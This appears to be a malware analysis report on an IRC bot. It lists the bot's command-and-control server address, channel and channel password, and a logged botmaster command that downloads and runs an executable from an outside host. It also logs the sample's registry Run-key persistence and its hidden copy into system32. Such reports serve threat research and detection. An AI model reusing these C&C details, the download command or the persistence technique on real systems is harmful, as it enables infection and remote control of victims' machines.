us.unicatz.com 74.117.174.82
C&C Server: 74.117.174.82:2010
Server Password:
Username: okcbisjs
Nickname: okcbisjs
Channel: #us# (Password: d0s)
Channeltopic: :
Now talking in #us#
Topic On: [ #us# ] [ .msn.addcontact wingate32.exe wingate32.zip wingate32.rar estas foto son toyo? estas foto son toyo? ]
Topic By: [ dgdg ]
(dgdg) .l huh
(dgdg) .down http://attacke.100free.com/inanaged.exe c:inanaged.exe 1
Registry Changes by all processes
Create or Open
Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “MSN” = C:Windowssystem32Windirs32.exe
Reads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESYSTEMWPAMediaCenter “Installed”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”
HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”
HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftRpcSecurityService “DefaultAuthLevel”
File Changes by all processes
New Files DeviceTcp
DeviceIp
DeviceIp
C:Windowssystem32Windirs32.exe
DeviceTcp
DeviceIp
DeviceIp
C:Windowssystem32Windirs32.exe
DeviceRasAcd
Opened Files .Ip
C:WINDOWSAppPatchsysmain.sdb
C:WINDOWSAppPatchsystest.sdb
DeviceNamedPipeShimViewer
C:Windowssystem32
.Ip
Deleted Files
Chronological Order Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:Windowssystem32Windirs32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:f3024245d512ddb9abcb5558860c0c7d to C:Windowssystem32Windirs32.exe
Set File Attributes: C:Windowssystem32Windirs32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:WINDOWSAppPatchsysmain.sdb (OPEN_EXISTING)
Open File: C:WINDOWSAppPatchsystest.sdb (OPEN_EXISTING)
Open File: DeviceNamedPipeShimViewer (OPEN_EXISTING)
Open File: C:Windowssystem32 ()
Find File: C:WINDOWSsystem32Windirs32.exe
Create/Open File: DeviceTcp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Create/Open File: DeviceIp (OPEN_ALWAYS)
Open File: .Ip (OPEN_EXISTING)
Get File Attributes: C:Windowssystem32Windirs32.exe Flags: (SECURITY_ANONYMOUS)
Set File Attributes: C:Windowssystem32Windirs32.exe Flags: (FILE_ATTRIBUTE_NORMAL SECURITY_ANONYMOUS)
Copy File: C:Windowssystem32Windirs32.exe to C:Windowssystem32Windirs32.exe
Set File Attributes: C:Windowssystem32Windirs32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Create/Open File: DeviceRasAcd (OPEN_ALWAYS)